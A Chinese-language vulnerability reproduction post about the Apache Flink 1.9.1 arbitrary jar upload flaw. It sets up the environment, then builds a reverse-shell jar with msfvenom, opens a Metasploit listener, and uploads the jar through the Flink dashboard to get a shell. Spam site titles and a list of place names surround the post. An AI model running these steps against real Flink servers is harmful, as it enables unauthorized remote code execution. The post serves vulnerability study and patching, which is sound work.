91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

發布時間:2021-12-28 15:27:02 來源:億速云 閱讀:242 作者:小新 欄目:安全技術

這篇文章給大家分享的是有關Apache Flink任意Jar包上傳致RCE漏洞的示例分析的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。

0x01漏洞概述

攻擊者可直接在Apache Flink Dashboard頁面中上傳任意jar包,從而達到遠程代碼執行的目的

0x02影響范圍

到目前Apache Flink 1.9.1版本

0x03環境搭建

攻擊機:kali

受害機:ubuntu16

1. 安裝java8環境,自行百度教程

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

2. 下載Flink1.9.1版本,然后解壓安裝包

Flink下載地址:https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

解壓 tar -zxvf

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

3. 進入bin目錄運行./start-cluster.sh啟動環境

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

4.在瀏覽器打開,出現以下界面表示安裝成功

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

0x04漏洞復現

1. 首先使用kali生成jar的后門包

msfvenom -p java/meterpreter/reverse_tcp LHOST=IP LPORT=port -f jar > shell.jar

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

2.使用msfconsole監聽shell設置的端口

use exploit/multi/handler

set payload java/shell/reverse_tcp

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

3.run開啟監聽

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

4.把制作好的shell.jar包訪問目標站點并上傳shell.jar

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

5.點擊Submit觸發漏洞,反彈回了shell

Apache Flink任意Jar包上傳致RCE漏洞的示例分析

0x05修復建議

更新官方補丁或更新最新版本

感謝各位的閱讀!關于“Apache Flink任意Jar包上傳致RCE漏洞的示例分析”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

舟山市| 溧水县| 乌兰浩特市| 陵川县| 郴州市| 长宁县| 慈利县| 邓州市| 肇州县| 行唐县| 梓潼县| 安远县| 巩留县| 康定县| 科技| 鄂州市| 宜兰县| 上林县| 聂荣县| 桐城市| 贵州省| 威宁| 康保县| 嵊州市| 肥西县| 广昌县| 东乡县| 博白县| 南昌市| 莱西市| 温州市| 旌德县| 民乐县| 惠州市| 泰顺县| 安平县| 南郑县| 徐闻县| 娄烦县| 乌恰县| 磐安县|